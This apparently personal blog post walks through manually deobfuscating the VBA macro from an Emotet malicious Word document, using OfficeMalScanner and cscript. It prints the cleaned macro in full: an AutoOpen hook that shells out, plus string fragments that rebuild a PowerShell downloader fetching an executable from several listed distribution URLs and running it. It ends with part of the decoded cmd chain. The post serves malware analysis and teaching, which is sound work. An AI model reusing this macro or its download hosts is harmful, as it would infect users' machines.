Deobfuscating an Emotet MalDoc Script

So this post covers the malicious macro script that was found in an older writeup for Emotet which you can find here. While one could develop tools to help deobfuscate the macro script like @David Ledbetter did in his blog post, I wanted to show another way of doing it – manually without any programs or scripts. I wanted to do it this way and document it since I have no talent or skill in the ways of developing programs/scripts to do this kind of work and to show that it is possible to those of us that are “code challenged.”

The Word document and some of the other artifacts can be found in my previous write-up mentioned above. There are a couple of ways that you can go about getting the malicious macro script(s) itself, but I am covering it using the OfficeMalScanner application.

Open a Command Prompt, and “cd” into the OfficeMalScanner directory. Once you are in that directory, proceed to type the following command: OfficeMalScanner.exe info. You should see something like the following screen indicating that OfficeMalScanner has found macro code and stored it on the filesystem somewhere (usually with the OfficeMalScanner binary).

With OfficeMalScanner creating the script files, we can start to take a look at them to try and figure out how the script works. As seen in the screen shot above, there are 4 files that were created, with only 3 of them being the ones that we want to focus on (since the ThisDocument has nothing of importance in it). The first script that we will want to look at is the one that contains the code that runs as soon as the document is opened via the subroutine called “AutoOpen()” which can be found in the GvHspFqNb file. What you will notice in this file, and the other 2 files is that there is A LOT of code. Don’t let that bother you as it is a way of distracting an analyst or researcher. A good rule of thumb is to look for any kind of patterns in the script(s) or things within the code that stand out. After going through these scripts and looking at them for a LONG time, I noticed a pattern in all the scripts as seen below.

Some other patterns stood out as well:

– In the files called “GvHspFqNb” and “zrUjpXiVR” there is a line break in the code (lines 240 and 325 respectively) with many variables being joined via the “+” (plus) symbol and assigned to a new variable.
— This is not the case in the “jdaJZipYi” file.
– All the functions in the scripts are also the ones that have other variables assigned to them as mentioned above.

The easiest way for me to start working through this was to start with the file “GvHspFqNb” and look at the long string in line 239 and see where the variables were being called in the script. For reference in case the line numbers are not the same for you, this is the line I am referring to:

XZGDjkTXd = iXjTfDtwt + MfwkTAlmO + Chr(34) + bdQLj + XcPJwimMDX + dboqFFzRwf + lvhKUmQuZY + XirAlwh + iEskAw + wjzpQ + hwScLdt + ddQwkYCj + nQjKcqjJ + AMUtVpRjYh + bAijVVwcoX + VoVzNUo + lVTntJNhYCV + jDbmziAMH + WpvWYmH + huhtlj + FOUYwvwbpJ + ooqYN + XSXcJLrKhLC + JwSpco + PoBuYhjKsAG + OuwfRiYsL + KIizSLY

Using Notepad++, I looked for the variables in the line above in all open files. The first two (iXjTfDtwt and MfwkTAlmO) are the function calls to the other scripts which contain more lines of garbage code (like the GvHspFqNb file). Looking through these files though, they seem to have the same pattern as I showed in the image above. Looking at some of the other variables in the line of code above, I could see that there were bits of code in them that stood out. Knowing this, and seeing the pattern from the image above, I started to clean up the files and remove the garbage code. Once everything was cleaned up and all the garbage code was removed, I ended up with this script:

Sub AutoOpen()
	Shell$ XZGDjkTXd, 0
End Sub

Function XZGDjkTXd()
	uwQwD = "lzllvfDiLiYtHEllId[1]'+'+tiQshElL'+'id[13]+3Gjx3Gj)')  -cREplACe  ([cHaR]116+[cHaR]105+[cHaR]81),[cHaR]36-REPLacE'3Gj',[cHaR]39-REPLacE([cHaR]80+[cHaR]66+[cHaR]119),[cHaR]124)) rjnV82tj"
	KIizSLY = Mid(uwQwD, 13, 165)
	
	GUQAYvOLYs = "q1bTYRaFBpDhwEfcJvLV0+'DB+sDBns3Gj+3GjDB+sDBes'+'DB+sDBdists'+'DB+sDBributor.com/sDB+sDBUVR3Gj+3GjJ/,h3Gj+3GjttpsD'+'B+sDB:/sDB+sDB/sDB+sD3N9"
	hwScLdt = Mid(GUQAYvOLYs, 22, 117)
	
	vvkjEGwiSMu = "sGKvLPr'+'EFErence)[1,3]+s3Gj+3GjDBxsDB-JoiNsDBsDB)3Gj+3Gj ((sDBaEsD'+'B+sDB1fsDB+sDBrasDB+sDBnc 3Gj+3Gj= sDB+sDBnewsDB'+'+sDB-sDKdwHo"
	XcPJwimMDX = Mid(vvkjEGwiSMu, 6, 124)
	
	jjGGrIHbYO = "1sDBhvi3Gj+3GjsDB+sDBgps.cosDB+sDBm/h/,sDB+sDBhttp://aj'+'asDB+sDBx3Gj+3GjtusDB+sDBbe.sDB+sDBco3Gj+3GjsDuSGLlTR0BH"
	nQjKcqjJ = Mid(jjGGrIHbYO, 2, 103)
	
	mIoHOJMvnnN = "qsLJLb4Lhu8jB3F1DB-objesDB+sDBct rsDB+sDBasDB+sDBndsDB+sDBosDB+sDBm'+';aE1bsDB+sDBcsDB+sDBd =sDB+sDB DsphsDB+sDBtsDB+sDBtp://sDB+sDBwwsDB+sD3Gj+3Gv9tj7"
	XirAlwh = Mid(mIoHOJMvnnN, 17, 130)
	
	ibfXDEP = "Dn7Rs6O9bKnKbjaZBm.NesDB+sDB'+'3Gj+3GjtsDB+sDB.sDB+sDBWesDB+sDBbCliesDB+sDBnts'+'DB+'+'sDB;sDB+sDBaE1nsDB+sDBsadasdsDB+sDB =s'+'DB+sD3Gj+3GjB sDB+sDBnewsD'+'B+s58fT3WGQ"
	lvhKUmQuZY = Mid(ibfXDEP, 17, 144)
	
	pFtUGf = "uDB+sDB){tr3Gj+3GjysDB+sDB{aE'+'1frsDB+sDBasD'+'B+sDBnsDB+sD1TuJYjDwwa8ODlE8"
	WpvWYmH = Mid(pFtUGf, 2, 58)
	
	vEKVJdvQuP = "1qGKl3lnha3zIT8Bwww.shopnz.in/fg/,sDB+sDBhtsDB+s3Gj+3GjDBtpsDB+sDB://csDB+sDBa'+'bsDB+sDBletvinternet'+'.usDB+sDBs/fFsDB+sDBQiRYu/,httsDB'+'+sDBp://www3Gj'+'+3Gj.sDB+sDBdongho'+'dinsDB+WVabF3HWDrkoEMtMHzGV8"
	ddQwkYCj = Mid(vEKVJdvQuP, 16, 170)
	
	CStArjjz = "msiEWjBw.sDB+sDBmesD3Gj+3GjB+sDBdi3Gj+3GMCP0pjVRfUq0GKdG4WRX8I"
	iEskAw = Mid(CStArjjz, 6, 35)
	
	FjtjpZk = "3ErDqNq32ffmsDB+sDB/DsDB+sDBsp.Split(DssDB'+'+sDBpsDB+sDB,sDB+sDBDsDB+sDBsp)sDB+s'+'DB;aE1karasDB+sDBpasDB+sDBssDB+sD'+'B = sDB+sDBaEsDB+sDB1nssDB+sDBadasd.nsDB+sDBext(sDB+sDB1, 343245);aEsDB+svztTdbB7C2lbtsanq"
	bAijVVwcoX = Mid(FjtjpZk, 13, 181)
	
	iRRziZvtijn = "QWIbzzpIY5XQf9iIYHu[c3Gj+3Giw8Bm4"
	JwSpco = Mid(iRRziZvtijn, 20, 8)
	
	cvlVVcqwil = "Qomwvvzlzem('+'asDB+sDBE1sDB+sDq4F4LZHjJwJwrrHGX50dK3hzm"
	FOUYwvwbpJ = Mid(cvlVVcqwil, 10, 22)
	
	tjLDBw = "zXN6P1I6GNvz9lS2Sz7cFGXunKHlLDB1huas = aE1esDB+sD'+'BnsDB+sDBv:sDB+sDB'+'pubsDB+sDBlsDB+sDBic sDB+sDB3Gj+3Gj+sDB+sDB DspsDB+sDB7H5'+'3Gj+3Gj'+'Dsp + aE1karapsDB+sDBas + s3Gj+3GjDB+sDBDsDB+sDBssDB+sDBp.exeDsp;sDB+sDBfosDB+PawImc"
	VoVzNUo = Mid(tjLDBw, 30, 192)
	
	wcspHsisr = "QDBc.sDB+sDBDownlsDB+sDB3Gj+'+'3GjoadFisDB+sDBlsDB+sDBe(aEsDB+sDB1asDB+sDBb'+'c.TsDB+sDBoStsDB+sD'+'BrisDB+sDBng(), aE1'+'huasDB+sDB'+'s);InsDB+3Gj+3'+'GjsDBvoke-ItsDB+sDB'+'1IwzwdpjJI3ApaM0ljw2DEIBEaJwrws4q3rdJG"
	huhtlj = Mid(wcspHsisr, 2, 173)
	
	Uzmwv = "IIiMXQODYXoAcsDBreachsDB+sDBl8R"
	lVTntJNhYCV = Mid(Uzmwv, 14, 15)
	
	jWjwjc = "RVllKPQUrvzisDB3Gj,[CHar]39)PBw .( tiQS9IJ"
	OuwfRiYsL = Mid(jWjwjc, 13, 27)
	
	NOYMJnY = "EuwI8L4vbOwJUUFqB+sD3G'+'j+3GjBm/tFsDB+sDBUIADPM4T6mz0E"
	AMUtVpRjYh = Mid(NOYMJnY, 17, 31)
	
	iEuqdSpLN = "9l9B'+'hsDB+sDBua'+'s)sDB+sDB;breasDB'+'+sDBk3Gj+3Gj;}catsDB+sDBch{wsDB+'+'sDBr3Gj+3GjisDB+sDBte-host aE1_.ExsDB+sDBceptionsDB+s'+'DB.sDB+sDBMessagesDB'+mSPrbFo7nGhnjV"
	ooqYN = Mid(iEuqdSpLN, 4, 150)
	
	oVfQLlUnd = "dVoBAdjHAr]55+[cHAr]72+[cHAr]53Gj+3Gj3),sDBzT2sDB'+').REpLacE(sDBaE1sDB,3Gj+3GjsDBmQes3Gj+3G'+'jDB) '+')3Gj) -cREpLaCe3GjmQe3Gj,'+'[CHar'+']36 -REplAce  3Gj'+'zT23Gj,[CHar]92 -REplAce 3GjTY8d7Jt4I6iFGR622N844jFaq"
	PoBuYhjKsAG = Mid(oVfQLlUnd, 7, 181)
	
	wYadCoTYO = "pslPESXKj(aE'+'1sDB+sDBasDB+sDBbc in aE1sDB+sDBbcds'+'io"
	jDbmziAMH = Mid(wYadCoTYO, 10, 45)
	
	APwTzEijQ = "aR5zHADU74lmhJSIPA& ( $ENv:COmSpeC[4,26,25]-Join'')( ((' ((3Gj & ( ([sTriNG]mQever'+'BoseDjQA65Cjd"
	bdQLj = Mid(APwTzEijQ, 19, 71)
	
	MCCmqvzB = "3n2EUwfOlUc6'+sDB;}}sDB).REpLacE(sDBDspsDB,['+'s'+'trI'+'ng][cH3Gj+3GjAr]39).REpLacE((bvIHfHz0cBT4dbGL3"
	XSXcJLrKhLC = Mid(MCCmqvzB, 13, 74)
	
	miGKlqHBFR = "QsQWU4B+sDBosD'+'B+3Gj+3GjsDBbje3Gj+3GjcsDB+sDBtsDB+sDB SystesDB+sDJDW3sNNwQOCjmh4jjaz"
	dboqFFzRwf = Mid(miGKlqHBFR, 7, 61)
	
	cuTLAlvCH = "L1Q5aMYp2cjcis'5iBQsIdD"
	wjzpQ = Mid(cuTLAlvCH, 11, 5)
	
	XZGDjkTXd = iXjTfDtwt + MfwkTAlmO + Chr(34) + bdQLj + XcPJwimMDX + dboqFFzRwf + lvhKUmQuZY + XirAlwh + iEskAw + wjzpQ + hwScLdt + ddQwkYCj + nQjKcqjJ + AMUtVpRjYh + bAijVVwcoX + VoVzNUo + lVTntJNhYCV + jDbmziAMH + WpvWYmH + huhtlj + FOUYwvwbpJ + ooqYN + XSXcJLrKhLC + JwSpco + PoBuYhjKsAG + OuwfRiYsL + KIizSLY
End Function

Function iXjTfDtwt()
	VdqQFBNou = "IwoXsiX  %RkhrYqacdtJELoHE"
	EZZCzll = Mid(VdqQFBNou, 8, 3)
	
	NRiKjBd = "jIBz wmXwEPjVsVhbWSlFooPz"
	XjGMbX = Mid(NRiKjBd, 5, 3)
	
	jINXG = "uwGVvWRqtJzMFWrAFfWBQzUdiVvoEZALE"
	owOtZHOiRj = Mid(jINXG, 24, 1)
	
	wkioikmkLcH = "KhObrhAZnYopWrQvOUcsnwO cSlr"
	VqGVJBmXd = Mid(wkioikmkLcH, 24, 1)
	
	vQrVszIqv = "iWbsYzYTPN FizCwwGNoErhvKotNamU"
	zEwju = Mid(vQrVszIqv, 11, 1)
	
	vVwnK = "UDOLKvTqLaNqwDYTqbhCBF  NGuYNfGFhz"
	RbXSjaRS = Mid(vVwnK, 23, 2)
	
	rEINGi = "YBNwPJcomXtYPjj"
	coRNqDLJYj = Mid(rEINGi, 7, 3)
	
	zJRzaFJ = "vEvw  wLQCkHwzHwSoqGzViFGzMsYIiG"
	BmXwbzrCJc = Mid(zJRzaFJ, 5, 2)
	
	oTTXw = "sipulGqhaHTGQ wjDcDowFqVuzlJuwncnhl"
	XwEsds = Mid(oTTXw, 14, 1)
	
	ilUHvwa = "czwOLMhSDFJMQhzVH   LnlZjlPGIYvuKoi"
	vWpfvFiJL = Mid(ilUHvwa, 18, 3)
	
	YhWGcJuwrqt = "WanfiuipBRVI jBIwzOAXku"
	BucHkjAD = Mid(YhWGcJuwrqt, 13, 1)
	
	wWnwiO = "oYDFWIfYz   b EdXcjBAjbzhLzhbNEwhSV"
	YcXODn = Mid(wWnwiO, 10, 3)

	WiCwBdJbNKX = "kJFCIChtEsFBOdvlZVY/ctJvKYticfW"
	tosGq = Mid(WiCwBdJbNKX, 20, 2)
	
	RPIcQw = "EtWtzWNzuzYIjiLfOSBHFPhYbNNJKX%vKGlA"
	TszAzmdib = Mid(RPIcQw, 31, 1)
	
	SizGkn = "owIpTJjRzuWYVVEwCDsCmfYEDnJhbNQsjisphffqz"
	LKRtazc = Mid(SizGkn, 35, 2)
	
	UYAiXmVUu = "Fq& mXfvZEwidzwEXiqZuwowNGYEOihuwRVavf"
	cJXiu = Mid(UYAiXmVUu, 3, 2)
	
	dGlbHjfZM = "hwIRUoUdIRFWQLZVDcSsIwwtdiKhSfZ  JzzwEIlw"
	uiCiVCWEEmt = Mid(dGlbHjfZM, 32, 2)
	
	GTiaJsr = "fGmIXBIidDzOIOEQqU suuArSTRPHECjkUrMEAt"
	RtNidJFco = Mid(GTiaJsr, 19, 1)
	
	jIKHF = "ZcdV TcwYGzLHbXoO"
	qaHiavBP = Mid(jIKHF, 5, 1)
	
	GWXbicWYGw = "LDzmYrjiJXdiJUsJqYA/v VUicHAEVmAc"
	LTUEMHjBFs = Mid(GWXbicWYGw, 20, 3)
	
	MiWSNwv = "wurzllpNBMvFvIckT rUqwtclYj"
	nFKKNhrtJRK = Mid(MiWSNwv, 18, 1)
	
	PzuvjCDQzW = "EmwhmqecYVzZ"
	mFaZJRmuLkB = Mid(PzuvjCDQzW, 7, 2)
	
	blAaU = "wwEGpipIQrMKdPCGIticqGTbMSozEOvUjn"
	FbWLohdXrpi = Mid(blAaU, 19, 2)
	
	isXEXFLorRp = "D YOcYAOTZSnUUhdoHzIjoBFhwjnMwX"
	jbwlJG = Mid(isXEXFLorRp, 2, 1)
	
	PwEKJOVfM = "Th CMViCGJQXv"
	HmfYARE = Mid(PwEKJOVfM, 3, 1)
	
	JkWkhJTiW = "ViqzcmlMWWjzvIRjuhfDkTEp"
	KPjmW = Mid(JkWkhJTiW, 5, 2)
	
	GfoViwNwXoF = "dTEfOG  jWmYEqL"
	kWCYnw = Mid(GfoViwNwXoF, 7, 2)
	
	ukFcXMsv = "zdkdVvXl BHruZHvp"
	VAiTA = Mid(ukFcXMsv, 9, 1)
	
	CWwutmJnz = "KvfkOrtIrIQLbfVvjEcV  dvTo"
	ZQLPiKfP = Mid(CWwutmJnz, 21, 2)
	
	iXjTfDtwt = KPjmW + owOtZHOiRj + BmXwbzrCJc + XjGMbX + FbWLohdXrpi + HmfYARE + RtNidJFco + VqGVJBmXd + cJXiu + EZZCzll + coRNqDLJYj + LKRtazc + mFaZJRmuLkB + TszAzmdib + XwEsds + ZQLPiKfP + uiCiVCWEEmt + qaHiavBP + VAiTA + LTUEMHjBFs + YcXODn + BucHkjAD + zEwju + jbwlJG + nFKKNhrtJRK + tosGq + RbXSjaRS + kWCYnw + vWpfvFiJL
End Function

Function MfwkTAlmO()
	IJSiMpijJz = "4RHj9LozHLNTRkDGMbVKzKzpjIBCBZduZNJrWCUaQjclBPO64RSzLmQ"
	hTCqCrmXhZa = Mid(IJSiMpijJz, 6, 36)
	
	XldjkNXGr = "W4Aj53zWphQSC4jCNFFJzHH5r5rZrJYsCXYTQzwwMKhIGXJmwiiStDaLkKGvtaToQoFidhIizdAzJNwwQibJbGwdRvTwv"
	JQtkV = Mid(XldjkNXGr, 28, 60)
	
	LITPNo = "XU9bvHYv0cBQWBEmUVwHjOJIUSwInTMVCOUSCBujlOfkOntrfIIDaYjPDwGJazjlHpOIhmkSbNVUjYuhZGdiKJudfEOFvkIoitdYZkJtYqbNDOjfBZjUUBawukcdYiXqEjmpvWHowjGUhhaRXiEVAoUhTidoIjUtSlIWbzla1vGSlz"
	LLwXaki = Mid(LITPNo, 12, 154)
	
	YsVYb = "E4iAanRQuicszLmbbnHlsUzcKAFJwRVHsAFwTQQvHlzsZKUlhziaquPnzaWEcGTcIUAwGpHLWLiGXFDAjTbzjuQwkSwttMSARUjEKXispXEfPJPuWWXIfUtNEBLosNRJsioDWwqIojJMqkibCCWXoKUzaVAIMqzbFumlUMYYjPTvVDmfaz"
	pAumPWpDqZt = Mid(YsVYb, 8, 165)
	
	ibWTaVU = "UXtrdwwMjGsBCmrtrSRfIQZEVQDbCWNJiOwKNKpHhQzClwaOHQWiilWKjWlivVKMsiWoojjjcKzrSXSYqpTmAjftsnaqZHLMGlJCZmZbjpBUnirMEMrGBYLIDdvAGqHVzllhNPwDPsCLiLFOwO723Qk3WzlrnfQBtjwuz"
	BRbwaiW = Mid(ibWTaVU, 6, 141)
	
	wqtPcjI = "DkvQjkrPMhjs9T"
	OajKQiMVz = Mid(wqtPcjI, 11, 1)
	
	AJCVXBj = "vGi0SctjhDlEDAzFMasjGiiHcRGoIsptAwEKdVCpHXPvQHVdczUONjYbuYfAWFXpOsEHwnbqXDZjPjrUwcMIXbfUXcQFqBTCzahYDOhpYdqKGpMKjKEttORmMjjTWVAVjXjoCTQhvXktkVNhQFYjzZJlJuLTiNSCdUbjFXINtWwVdXCrWBCRzTYJNwfHHzChEiQcjoL0mLIwE"
	NwbTPTJck = Mid(AJCVXBj, 5, 191)
	
	UjAwF = "U1vc2AX4j1QGYNmPZDTlUDSXjlnHoMsCBrohXrtWwLfrLkHwMjndSwZjQQoTXdLwnOEhZErhKzoJXbMvirvHYOjDSERHDZzTAjEwjaXHpGTVKQMpEtpjiDXYiBOUnkilzVIoWPPDTY6r"
	lwwfAvrvaKA = Mid(UjAwF, 11, 127)
	
	kbknmH = "oH8MVzGlZYolmbRMMwhiLoXbrjKwwNjmwsFsjj1XQ"
	lwoiKVvn = Mid(kbknmH, 6, 27)
	
	LtKqoNaQBjv = "z4vWuqkfRvXkvFRNKLFpaCqQMFWQsTjQOMBvYDphwYDFQjlNNQiwafSQvrKWTTmwOHViDVoGVYqBwkAcTJCbojqjtlAjtSNilFrJNDJsbYaCoRSKrhDKRLJiQmqiZi897QBQ"
	PJWGNzsnTo = Mid(LtKqoNaQBjv, 6, 117)
	
	BiqUYbtU = "zQvGSd5Bf2rZwUHcZJNPEcfAnvbJVIZICJGUDFFZMPwzXDpnHJwDOhwAzEvVNBDZzVWnNmYTD6On333CuuVQf4Ykd9Mb35CI"
	QCjlpW = Mid(BiqUYbtU, 12, 62)
	
	YzzUw = "jQWGFwZqdnORPtwBqIjwDrqVBiGAuHMhhXutdrZsscNRjIKzIJYHcoMFqBFXqZwWbhkrzCYzinDadZosYIrkiEFsLoDclCBTjrpzYSXnLHSLjl55N6zdCR"
	NSdXNpGrzmH = Mid(YzzUw, 3, 100)
	
	ocCskfsi = "FP06Fa4oDpjfdkGnBLJWuUKGXzKkMLMXCBjCaVlizaiJUSaLPazrPabCcHPYJTbqzATXzpZvqjJkVV"
	HSVoC = Mid(ocCskfsi, 8, 56)
	
	CvYHzJDD = "uiW9GEkOlIsjalPkUASoWzroXZioDjirActQtWsmWGZffoXjRVCTStipzuGhVwLBdAfzrwrwHjRQYMIjBCWhhLZHuETwQKQZuYCfIZoTiDLmbRRllXjTZiTSbXDnfsizPrVAKdabNDCdzmjcnhNtiwAQEkDkWBomVOWjwRbHwEGWcpSorazzipSTrFvaZqELPPIlQzB9XUS9pQ"
	hwbkklnwO = Mid(CvYHzJDD, 5, 194)
	
	GvkzX = "CFncjwzjhFHwbrzfdqSoHEHjZZQRwsTfEGvhuJPVcADXsuHbsoPdYGLUwGCHhjnqmA8mWXEQWMa2TuBPI9IHmZ"
	avQTGO = Mid(GvkzX, 4, 60)
	
	VvHrC = "85ZL10F8mUV8FfombrUwQkTazMGBkqfRpZHdqHzuainGInvNOlRCmibDvDbuETOQXqsGfLwUtaWhzNRJQtmzZciKzDhmfDpHUXjRvoiDpwIMItGilSiLhPquLiY4KRH0QjfcVub"
	GwzqV = Mid(VvHrC, 15, 108)
	
	YjhQMhKPJ = "qq09kPZQhnJjjumjoUFLlzIfdqd1"
	OKiwmvjVqu = Mid(YjhQMhKPJ, 13, 12)
	
	EVLBiDVB = "14CVOQ7WpSUHNCKLQstqPQzJzQJoucSppLPDNawMsbOqYTKXrdAaRASnLHLsVcsMziSBnHzpvjwnCIljFlwQbsYoscsGPDrPiBrtBJkkfLilCikCVfnjfbkGGdJKPrasoiFARsiwAMlQOmmNrpkjQHkHQkmXzZUnklwTZkkcAqiTpUsTrvTZGq6wut"
	JiqhzRHcFB = Mid(EVLBiDVB, 9, 174)
	
	MYYTUH = "m4BLCBcNmNPELhZAzwrZVtijUCtJwoOorJVAasXjErEtFuaDINQCMpXJdCqDUmPwzbNCLYaGYKVdpobZcqBlXLbClMXYBUMRcFudhYrjmJdCTuToaQbikdanALQzBCFEwDAjtzsEzRzNiYirsizlthhwfHdWHsikEZEPtkvdYXfSiMFbcYGTFTLziC4pfTZL"
	zYNHlYddIz = Mid(MYYTUH, 9, 175)
	
	oHFCX = "mGPsdJdbDDMjafXUpBlEYwVmLUHbadaSGMVfwmj7hQTBmhwPccsjw5"
	nULGrjckiH = Mid(oHFCX, 4, 36)
	
	PUjfCHhVSAi = "AqzQYlLhXTSjlqruUiJrcAwhwwkhGvwzGpdwrZqZlszjpcEIkLaEbdkXawSVKdbcVVcwNsDusjFjCRrTtcwuVuVdFFXsHUOHRVLUzIvrIfLsXAVIHzcihjGbzzqHVKnXUwRjFXUkhEmpidaXT2"
	VokiKdBLhMG = Mid(PUjfCHhVSAi, 7, 136)
	
	wuiVz = "rJbiJpqkONZizNbKjJdUSBDwzBMYiaFhoGNfGYjHsuORiUtHdw99ACVZ"
	vfXjdA = Mid(wuiVz, 2, 39)
		
	dwjQFnHSG = "TrYdhFml3jbHFsV4YTlZGDjkTXd%=V2"
	Dvijf = Mid(dwjQFnHSG, 20, 10)
	
	mYllC = "DsMkWiqGbIFFTnizAwmPrmTQv"
	ziRjVOmWMK = Mid(mYllC, 2, 5)
	
	kRkSsadNq = "YQLTbX3860h3G1fvJ1ZaiLzHk"
	tHTZAGq = Mid(kRkSsadNq, 3, 4)
	
	ioinjjXbknZ = "i74cPMNHscvRzmT8wHFLobpqp %fwbPvzwZRT8"
	tGDFZjErW = Mid(ioinjjXbknZ, 26, 11)
	
	sBdikZIHPUP = "ooWszRfBOa&&!%ff1PXGvrWsE3"
	AzlILsjAY = Mid(sBdikZIHPUP, 6, 10)
	
	QENcwftH = "zriMOzzAAsbLA&&setjfz6d4c80K26pj36"
	QXPohv = Mid(QENcwftH, 6, 13)
	
	TJfZaJMJ = "AZjbDJzZoGz3Q9MhocUu"
	ZjfzoE = Mid(TJfZaJMJ, 16, 1)
	
	oSEDt = "JTAqAU4zV69dw1JASJ44TcMoVHN0637shHprqLp5f"
	zCdSXAjaRIW = Mid(oSEDt, 21, 3)
	
	viFUUD = "1fcset %mwIN84IKDJAqjrj"
	mjoMCELKTrL = Mid(viFUUD, 4, 6)

	bFQsh = "DpznjkZU6Dv80HsPTiiASUTiUfGLTb&&set %XhLVVUl3N1oljoj"
	wzdXMPnbq = Mid(bFQsh, 25, 14)
	
	wZXURK = "Cz0O2MW2N^h^e^jn"
	OKqdMXNZ = Mid(wZXURK, 10, 5)
	
	DmVPjfKZu = "t6LwIEKw%=zUtPdpzzbLHnkvdkAv"
	AYzqBm = Mid(DmVPjfKZu, 3, 9)
	
	bZIuccY = "HQEr7wYvX3RBIMTS8SnQapnVM8kDrO5wPmwM"
	PQrKcSXml = Mid(bZIuccY, 34, 1)
	
	TOKsLq = "Yql^Hm7GmQJAvlS"
	WbUVj = Mid(TOKsLq, 3, 2)
	
	sSMZQ = "L7sU58qTozMmVOmbRzBfTzcJhMGFcj94KQKtz"
	jILCihziF = Mid(sSMZQ, 8, 14)
	
	bfinkhFLK = "riHkHtnHvKLYStWY%XZGDjkm39V"
	tAqPRYum = Mid(bfinkhFLK, 17, 7)
	
	pWNXGYiJhKi = "NoMJpqY%=qEIKFtDqWTbFVM0vH8N6FHjqnUj"
	uRwGYfEkAQZ = Mid(pWNXGYiJhKi, 7, 13)
	
	GWiWiVYzSfJ = "QzjaoqRfvqCsrNN85nmr9set %LGsjYr8ml"
	LmdISa = Mid(GWiWiVYzSfJ, 22, 11)
	
	ruqCwOEGXzd = "niqPuPUVf6omv7LzR1iWLTQXPtEpNwaoc"
	XJnwOGUWo = Mid(ruqCwOEGXzd, 29, 3)
	
	hYwZzrSbGTi = "7bI3SzF4M&set %JLUTltY0mdswojE68qbfIzjVm3i"
	Nbqjo = Mid(hYwZzrSbGTi, 10, 9)
	
	JpuoU = "fhZr1HcDwK39HuQrj0UNToqGQTQTrs4l&&set %ikv1Qu8Jm"
	PArdvDKi = Mid(JpuoU, 32, 11)
	
	tzPsNvm = "dVOwI1bzMX^e^5kI4"
	NIzzFOGqLj = Mid(tzPsNvm, 11, 3)
	
	OWSOfo = "0Hzafz6N4pAMzz1o8tCHqp17cTsDVE"
	TwAIIIK = Mid(OWSOfo, 27, 2)
	
	ifmtXr = "U3n4bWU04YL%=p&zPudO3hZt"
	vAdNYSUc = Mid(ifmtXr, 12, 4)
	
	AvAnQ = "GRnLYi4j29kct%=oZiBdA3wMdk"
	BnHlmrzFM = Mid(AvAnQ, 11, 6)
	
	OwhUDKSWiC = "uG6pmLC7MY1FGJMjiM&Ar"
	rEITZa = Mid(OwhUDKSWiC, 19, 1)
	
	OLhwVWKvRdH = "C6HA7ZPPHzmWS5zOJkMTZWpApXrRlFuop%=LvG"
	zjPpC = Mid(OLhwVWKvRdH, 27, 9)
	
	YqQPkwWw = "M3rwAkXzU3puHokpjKAdFFmVt3EvlrWdzjLqWzuV"
	XktLqwnUdJs = Mid(YqQPkwWw, 12, 9)
	
	CjamG = "FKYRQ8z&PD7Zn"
	MiOKmrq = Mid(CjamG, 8, 1)
	
	upVJZ = "TmtzSu9To7jH6bOMrXBVTWAzGAozkRBjM7Y"
	zwILaa = Mid(upVJZ, 25, 1)
	
	tDrjnvszL = "3s7mnV1NWlfq1z%=EoRfENrKH"
	RBiKzcMija = Mid(tDrjnvszL, 15, 7)
	
	ppPhwr = "9fFTXd%!  pIfRInF"
	JhpSDwZBpn = Mid(ppPhwr, 4, 7)
	
	fkWowkJUAN = "qozL9uQ^s&&8WFS8K"
	zPHmjXKv = Mid(fkWowkJUAN, 8, 4)
	
	CNMIOGIlb = "N57iu36MEwHqHwrRJzjTfq3Ln1ozYiM4EqZpn85q"
	YzpiHzb = Mid(CNMIOGIlb, 15, 1)
	
	hbACHzwL = "r43cw93^wrhT2"
	IPKtqi = Mid(hbACHzwL, 8, 2)
	
	HwUbDwiRclw = "f1IirzJRpwbPvzwZR%!hJtl"
	BoEMQYon = Mid(HwUbDwiRclw, 10, 10)
	
	IEGwja = "nXWhGct%!!DYXdRS69vFQnT"
	jbFjTiZNRkS = Mid(IEGwja, 6, 5)
	
	TSCAMUJiE = "PNJA!%JLUNwakz2zNZKH3Vctq3"
	tXLmomKw = Mid(TSCAMUJiE, 5, 9)
	
	wbtAEkvBCk = "O1ksTzSzIfzN71Tnf3VHA6AFwJbBYLjv"
	LpoVBRpKp = Mid(wbtAEkvBCk, 9, 2)
	
	ThrcBzTwSc = "DQhz5uALtYr6LpDSrd4NvmHVs1dfr8lLojUGMqf"
	bPjIiIIiID = Mid(ThrcBzTwSc, 15, 2)
	
	FtVBsI = "0ucHTFSCmY5set %cjfjVtL33SiYF7qStpNwSP"
	HXCidB = Mid(FtVBsI, 12, 9)
	
	GzsLibALziw = "URHXCGBpWi7KFo"
	tTLwwzjCi = Mid(GzsLibALziw, 2, 1)
	
	MfwkTAlmO = mjoMCELKTrL + jILCihziF + RBiKzcMija + tHTZAGq + rEITZa + Nbqjo + XJnwOGUWo + BnHlmrzFM + IPKtqi + NIzzFOGqLj + YzpiHzb + zPHmjXKv + LmdISa + zCdSXAjaRIW + AYzqBm + QXPohv + tGDFZjErW + vAdNYSUc + MiOKmrq + HXCidB + zwILaa 	+ ZjfzoE + bPjIiIIiID + zjPpC + XktLqwnUdJs + wzdXMPnbq + Dvijf + OKqdMXNZ + WbUVj + PArdvDKi + TwAIIIK + ziRjVOmWMK + LpoVBRpKp + tTLwwzjCi + PQrKcSXml + uRwGYfEkAQZ + AzlILsjAY + BoEMQYon + tXLmomKw + jbFjTiZNRkS + tAqPRYum + JhpSDwZBpn
End Function

So the above code looks like it is using the “MID” function on the variable and defining where it should start and how far it should look in that string to get the value(s). Once it has done that, it then assigns that value to a new variable. It then joins them all via the “+” sign and assigns that value into a new variable. The main function is “XZGDjkTXd” which is where the other two functions get called from.

So now that we have the cleaned up code and it is somewhat readable, it is time for the next step – run the code through “WSCRIPT” on the Windows VM to see what the script decodes to. In order to do that, all you need to do is append “wscript.echo (XZGDjkTXd)” at the end of the cleaned up code. The reason that we are using “XZGDjkTXd” in the echo is because that is where the final “put back together” code would be. I saved that file as .vbs so I could run it. Now open a new command prompt (if you closed out the one from above) and run the following command to create the “put back together” file: cscript .vbs > > .log. This command will take the output from the “cscript” and create a new file with the output from it being run (instead of to the screen). Once you have done that, you should see the newly created script file which is still obfuscated as seen below (cleaned up a bit for ease of reading).

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
